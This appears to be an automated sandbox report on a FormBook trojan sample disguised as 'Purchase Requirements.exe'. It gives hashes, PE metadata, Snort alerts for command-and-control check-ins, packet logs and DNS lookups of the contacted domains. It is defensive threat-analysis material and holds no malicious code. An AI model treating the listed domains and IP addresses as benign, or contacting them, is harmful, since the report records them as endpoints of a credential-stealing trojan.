                                                        Entropy (8bit):7.3718333645387135
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Windows Screen Saver (13104/52) 0.07%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        File name:Purchase Requirements.exe
                                                        File size:774656
                                                        MD5:5bd387d81d1d7d7fd4dbeabebbb46b1b
                                                        SHA1:a832689604786e188bcc5c9020c28f693b2eb460
                                                        SHA256:fe7e173fd8a3d646508573bb2f7ef52f7efd25a8e2aef1b754dcf95ceb797f8a
                                                        SHA512:ddd4164c8c94d9b3da6d78293f148ec39f8128b2a7de7092ea2ebb42f92d81d3abe1b6586f8c4f7f83144f06109eee93d2409b46e56544d3917be3ec49b7c24c
                                                        SSDEEP:12288:W7Sx46OinbMVOfLrnCVvfoF2m2qdkQX6tpgWS6fSYTZ5wzTaQ12iN:ISxxHbyOjrnCVoFEe6QY5V5QaQ11
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................P.............&.... ........@.. .......................@............@................................

                                                        File Icon

                                                        Icon Hash:00828e8e8686b000

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x4be726
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                        Time Stamp:0xF489FAD9 [Sun Jan 3 18:15:53 2100 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:v4.0.30319
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xbe6d40x4f.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc00000x5dc.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xc20000xc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xbe6b80x1c.text
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000xbc72c0xbc800False0.772495907245data7.37998351086IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .rsrc0xc00000x5dc0x600False0.428385416667data4.16092515581IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0xc20000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountry
                                                        RT_VERSION0xc00900x34cdata
                                                        RT_MANIFEST0xc03ec0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                        Imports

                                                        DLLImport
                                                        mscoree.dll_CorExeMain

                                                        Version Infos

                                                        DescriptionData
                                                        Translation0x0000 0x04b0
                                                        LegalCopyrightCopyright 2020
                                                        Assembly Version1.0.0.0
                                                        InternalNameUIPermissionAttribu.exe
                                                        FileVersion1.0.0.0
                                                        CompanyName
                                                        LegalTrademarks
                                                        Comments
                                                        ProductNameModul VB 3
                                                        ProductVersion1.0.0.0
                                                        FileDescriptionModul VB 3
                                                        OriginalFilenameUIPermissionAttribu.exe

                                                        Network Behavior

                                                        Snort IDS Alerts

                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                        08/03/21-19:27:35.354372TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976580192.168.2.423.227.38.74
                                                        08/03/21-19:27:35.354372TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976580192.168.2.423.227.38.74
                                                        08/03/21-19:27:35.354372TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976580192.168.2.423.227.38.74
                                                        08/03/21-19:27:35.434939TCP1201ATTACK-RESPONSES 403 Forbidden804976523.227.38.74192.168.2.4
                                                        08/03/21-19:27:46.136247TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976980192.168.2.4162.241.85.227
                                                        08/03/21-19:27:46.136247TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976980192.168.2.4162.241.85.227
                                                        08/03/21-19:27:46.136247TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976980192.168.2.4162.241.85.227
                                                        08/03/21-19:27:51.497191TCP1201ATTACK-RESPONSES 403 Forbidden804977034.102.136.180192.168.2.4
                                                        08/03/21-19:28:01.928576TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977280192.168.2.4160.153.136.3
                                                        08/03/21-19:28:01.928576TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977280192.168.2.4160.153.136.3
                                                        08/03/21-19:28:01.928576TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977280192.168.2.4160.153.136.3
                                                        08/03/21-19:28:07.027830TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977380192.168.2.434.102.136.180
                                                        08/03/21-19:28:07.027830TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977380192.168.2.434.102.136.180
                                                        08/03/21-19:28:07.027830TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977380192.168.2.434.102.136.180
                                                        08/03/21-19:28:07.141590TCP1201ATTACK-RESPONSES 403 Forbidden804977334.102.136.180192.168.2.4

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Aug 3, 2021 19:25:55.174081087 CEST4434968320.190.159.138192.168.2.4
                                                        Aug 3, 2021 19:25:55.174117088 CEST4434968320.190.159.138192.168.2.4
                                                        Aug 3, 2021 19:25:55.174173117 CEST4434968320.190.159.138192.168.2.4
                                                        Aug 3, 2021 19:25:55.174196959 CEST4434968320.190.159.138192.168.2.4
                                                        Aug 3, 2021 19:25:55.174217939 CEST4434968320.190.159.138192.168.2.4
                                                        Aug 3, 2021 19:25:55.174238920 CEST4434968320.190.159.138192.168.2.4
                                                        Aug 3, 2021 19:25:55.174242020 CEST49683443192.168.2.420.190.159.138
                                                        Aug 3, 2021 19:25:55.174261093 CEST4434968320.190.159.138192.168.2.4
                                                        Aug 3, 2021 19:25:55.174279928 CEST49683443192.168.2.420.190.159.138
                                                        Aug 3, 2021 19:25:55.174280882 CEST4434968320.190.159.138192.168.2.4
                                                        Aug 3, 2021 19:25:55.174299955 CEST4434968320.190.159.138192.168.2.4
                                                        Aug 3, 2021 19:25:55.174304008 CEST49683443192.168.2.420.190.159.138
                                                        Aug 3, 2021 19:25:55.174345970 CEST49683443192.168.2.420.190.159.138
                                                        Aug 3, 2021 19:25:55.179467916 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.233954906 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.233989954 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.234106064 CEST49700443192.168.2.4131.253.33.200
                                                        Aug 3, 2021 19:25:55.337177038 CEST49700443192.168.2.4131.253.33.200
                                                        Aug 3, 2021 19:25:55.359999895 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.364830971 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.364869118 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.364892960 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.364921093 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.364945889 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.364959955 CEST49700443192.168.2.4131.253.33.200
                                                        Aug 3, 2021 19:25:55.364969969 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.364994049 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.365003109 CEST49700443192.168.2.4131.253.33.200
                                                        Aug 3, 2021 19:25:55.365019083 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.365042925 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.365048885 CEST49700443192.168.2.4131.253.33.200
                                                        Aug 3, 2021 19:25:55.365067005 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.365077019 CEST49700443192.168.2.4131.253.33.200
                                                        Aug 3, 2021 19:25:55.365092039 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.365118980 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.365119934 CEST49700443192.168.2.4131.253.33.200
                                                        Aug 3, 2021 19:25:55.365144014 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.365164042 CEST49700443192.168.2.4131.253.33.200
                                                        Aug 3, 2021 19:25:55.365166903 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.365187883 CEST49700443192.168.2.4131.253.33.200
                                                        Aug 3, 2021 19:25:55.365191936 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.365206957 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.365222931 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.365241051 CEST49700443192.168.2.4131.253.33.200
                                                        Aug 3, 2021 19:25:55.365282059 CEST49700443192.168.2.4131.253.33.200
                                                        Aug 3, 2021 19:25:55.782936096 CEST49700443192.168.2.4131.253.33.200
                                                        Aug 3, 2021 19:25:55.797224998 CEST49700443192.168.2.4131.253.33.200
                                                        Aug 3, 2021 19:25:55.806106091 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.809020042 CEST49712443192.168.2.420.190.159.138
                                                        Aug 3, 2021 19:25:55.809181929 CEST49712443192.168.2.420.190.159.138
                                                        Aug 3, 2021 19:25:55.820199966 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.824198961 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.824238062 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.824258089 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.824279070 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.824301004 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.824320078 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.824336052 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.824351072 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.824366093 CEST49700443192.168.2.4131.253.33.200
                                                        Aug 3, 2021 19:25:55.824393034 CEST49700443192.168.2.4131.253.33.200
                                                        Aug 3, 2021 19:25:55.824397087 CEST49700443192.168.2.4131.253.33.200
                                                        Aug 3, 2021 19:25:55.824400902 CEST49700443192.168.2.4131.253.33.200
                                                        Aug 3, 2021 19:25:55.824414968 CEST49700443192.168.2.4131.253.33.200
                                                        Aug 3, 2021 19:25:55.850636005 CEST4434971220.190.159.138192.168.2.4
                                                        Aug 3, 2021 19:25:55.850672007 CEST4434971220.190.159.138192.168.2.4
                                                        Aug 3, 2021 19:25:55.863240957 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.863274097 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:55.863420010 CEST49700443192.168.2.4131.253.33.200
                                                        Aug 3, 2021 19:25:55.863445044 CEST49700443192.168.2.4131.253.33.200
                                                        Aug 3, 2021 19:25:55.895025015 CEST4434971220.190.159.138192.168.2.4
                                                        Aug 3, 2021 19:25:55.948112011 CEST4434971220.190.159.138192.168.2.4
                                                        Aug 3, 2021 19:25:55.950495958 CEST4434971220.190.159.138192.168.2.4
                                                        Aug 3, 2021 19:25:55.950531960 CEST4434971220.190.159.138192.168.2.4
                                                        Aug 3, 2021 19:25:55.950547934 CEST4434971220.190.159.138192.168.2.4
                                                        Aug 3, 2021 19:25:55.950565100 CEST4434971220.190.159.138192.168.2.4
                                                        Aug 3, 2021 19:25:55.950583935 CEST4434971220.190.159.138192.168.2.4
                                                        Aug 3, 2021 19:25:55.950607061 CEST4434971220.190.159.138192.168.2.4
                                                        Aug 3, 2021 19:25:55.950633049 CEST4434971220.190.159.138192.168.2.4
                                                        Aug 3, 2021 19:25:55.950647116 CEST4434971220.190.159.138192.168.2.4
                                                        Aug 3, 2021 19:25:55.951694965 CEST49712443192.168.2.420.190.159.138
                                                        Aug 3, 2021 19:25:56.128962040 CEST49700443192.168.2.4131.253.33.200
                                                        Aug 3, 2021 19:25:56.129072905 CEST49700443192.168.2.4131.253.33.200
                                                        Aug 3, 2021 19:25:56.129115105 CEST49700443192.168.2.4131.253.33.200
                                                        Aug 3, 2021 19:25:56.129152060 CEST49700443192.168.2.4131.253.33.200
                                                        Aug 3, 2021 19:25:56.129185915 CEST49700443192.168.2.4131.253.33.200
                                                        Aug 3, 2021 19:25:56.129208088 CEST49700443192.168.2.4131.253.33.200
                                                        Aug 3, 2021 19:25:56.129221916 CEST49700443192.168.2.4131.253.33.200
                                                        Aug 3, 2021 19:25:56.129240990 CEST49700443192.168.2.4131.253.33.200
                                                        Aug 3, 2021 19:25:56.129256964 CEST49700443192.168.2.4131.253.33.200
                                                        Aug 3, 2021 19:25:56.129272938 CEST49700443192.168.2.4131.253.33.200
                                                        Aug 3, 2021 19:25:56.151968956 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:56.151998997 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:56.152009964 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:56.152024031 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:56.152036905 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:56.152050972 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:56.152158976 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:56.152242899 CEST44349700131.253.33.200192.168.2.4
                                                        Aug 3, 2021 19:25:56.152270079 CEST44349700131.253.33.200192.168.2.4

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Aug 3, 2021 19:25:55.201544046 CEST5912353192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:25:55.229059935 CEST53591238.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:25:56.869260073 CEST5453153192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:25:56.894224882 CEST53545318.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:25:56.941402912 CEST4971453192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:25:56.968915939 CEST53497148.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:25:57.517323017 CEST5802853192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:25:57.552398920 CEST53580288.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:25:58.134536982 CEST5309753192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:25:58.167174101 CEST53530978.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:25:58.757451057 CEST4925753192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:25:58.806896925 CEST53492578.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:25:58.816061974 CEST6238953192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:25:58.842102051 CEST53623898.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:26:00.280056000 CEST4991053192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:26:00.304665089 CEST53499108.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:26:01.183069944 CEST5585453192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:26:01.218461037 CEST53558548.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:26:01.902631044 CEST6454953192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:26:01.930196047 CEST53645498.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:26:03.413288116 CEST6315353192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:26:03.441109896 CEST53631538.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:26:04.417593002 CEST5299153192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:26:04.442564011 CEST53529918.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:26:05.120994091 CEST5370053192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:26:05.146989107 CEST53537008.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:26:05.792354107 CEST5172653192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:26:05.817668915 CEST53517268.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:26:06.457093000 CEST5679453192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:26:06.502882004 CEST53567948.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:26:07.547740936 CEST5653453192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:26:07.580404043 CEST53565348.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:26:08.399332047 CEST5662753192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:26:08.431659937 CEST53566278.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:26:09.066287994 CEST5662153192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:26:09.092766047 CEST53566218.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:26:09.799686909 CEST6311653192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:26:09.827192068 CEST53631168.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:26:10.503252983 CEST6407853192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:26:10.532072067 CEST53640788.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:26:11.231051922 CEST6480153192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:26:11.256197929 CEST53648018.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:26:30.534605980 CEST6172153192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:26:30.572247028 CEST53617218.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:26:49.619663000 CEST5125553192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:26:49.662575006 CEST53512558.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:26:50.744262934 CEST6152253192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:26:50.785393953 CEST53615228.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:26:52.174566031 CEST5233753192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:26:52.202295065 CEST53523378.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:26:52.438813925 CEST5504653192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:26:52.472688913 CEST53550468.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:26:52.688551903 CEST4961253192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:26:52.729804039 CEST53496128.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:26:53.198299885 CEST4928553192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:26:53.231735945 CEST53492858.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:26:53.705002069 CEST5060153192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:26:53.745213032 CEST53506018.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:26:53.820571899 CEST6087553192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:26:53.899686098 CEST53608758.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:26:54.574515104 CEST5644853192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:26:54.607640028 CEST53564488.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:26:55.181123972 CEST5917253192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:26:55.216394901 CEST53591728.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:26:56.325200081 CEST6242053192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:26:56.357481003 CEST53624208.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:26:57.683137894 CEST6057953192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:26:57.708847046 CEST53605798.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:26:58.977643967 CEST5018353192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:26:59.012772083 CEST53501838.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:27:00.750520945 CEST6153153192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:27:00.785722971 CEST53615318.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:27:01.510530949 CEST4922853192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:27:01.543102980 CEST53492288.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:27:09.630198956 CEST5979453192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:27:09.664638996 CEST53597948.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:27:35.279978991 CEST5591653192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:27:35.329180956 CEST53559168.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:27:39.973368883 CEST5275253192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:27:40.006134033 CEST53527528.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:27:40.440021038 CEST6054253192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:27:40.485950947 CEST53605428.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:27:41.912208080 CEST6068953192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:27:41.957894087 CEST53606898.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:27:45.831993103 CEST6420653192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:27:45.993046999 CEST53642068.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:27:51.321647882 CEST5090453192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:27:51.360105038 CEST53509048.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:27:56.505218029 CEST5752553192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:27:56.552784920 CEST53575258.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:28:01.860449076 CEST5381453192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:28:01.900547028 CEST53538148.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:28:06.971309900 CEST5341853192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:28:07.008965969 CEST53534188.8.8.8192.168.2.4
                                                        Aug 3, 2021 19:28:12.162316084 CEST6283353192.168.2.48.8.8.8
                                                        Aug 3, 2021 19:28:12.199184895 CEST53628338.8.8.8192.168.2.4

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                        Aug 3, 2021 19:27:35.279978991 CEST192.168.2.48.8.8.80xb5cfStandard query (0)www.thefitflect.comA (IP address)IN (0x0001)
                                                        Aug 3, 2021 19:27:40.440021038 CEST192.168.2.48.8.8.80xe40aStandard query (0)www.braun-mathematik.onlineA (IP address)IN (0x0001)
                                                        Aug 3, 2021 19:27:45.831993103 CEST192.168.2.48.8.8.80x3d5Standard query (0)www.mariasmoworldwide.comA (IP address)IN (0x0001)
                                                        Aug 3, 2021 19:27:51.321647882 CEST192.168.2.48.8.8.80xeaccStandard query (0)www.goldenstatelabradoodles.comA (IP address)IN (0x0001)
                                                        Aug 3, 2021 19:27:56.505218029 CEST192.168.2.48.8.8.80x2e7bStandard query (0)www.mynjelderlaw.comA (IP address)IN (0x0001)
                                                        Aug 3, 2021 19:28:01.860449076 CEST192.168.2.48.8.8.80xbd27Standard query (0)www.narrowpathwc.comA (IP address)IN (0x0001)
                                                        Aug 3, 2021 19:28:06.971309900 CEST192.168.2.48.8.8.80xb7f8Standard query (0)www.teamtacozzzz.comA (IP address)IN (0x0001)
                                                        Aug 3, 2021 19:28:12.162316084 CEST192.168.2.48.8.8.80x498eStandard query (0)www.theredcymbalsco.comA (IP address)IN (0x0001)

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                        Aug 3, 2021 19:27:35.329180956 CEST8.8.8.8192.168.2.40xb5cfNo error (0)www.thefitflect.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                        Aug 3, 2021 19:27:35.329180956 CEST8.8.8.8192.168.2.40xb5cfNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                        Aug 3, 2021 19:27:40.485950947 CEST8.8.8.8192.168.2.40xe40aNo error (0)www.braun-mathematik.online217.160.0.129A (IP address)IN (0x0001)
                                                        Aug 3, 2021 19:27:45.993046999 CEST8.8.8.8192.168.2.40x3d5No error (0)www.mariasmoworldwide.commariasmoworldwide.comCNAME (Canonical name)IN (0x0001)
                                                        Aug 3, 2021 19:27:45.993046999 CEST8.8.8.8192.168.2.40x3d5No error (0)mariasmoworldwide.com162.241.85.227A (IP address)IN (0x0001)
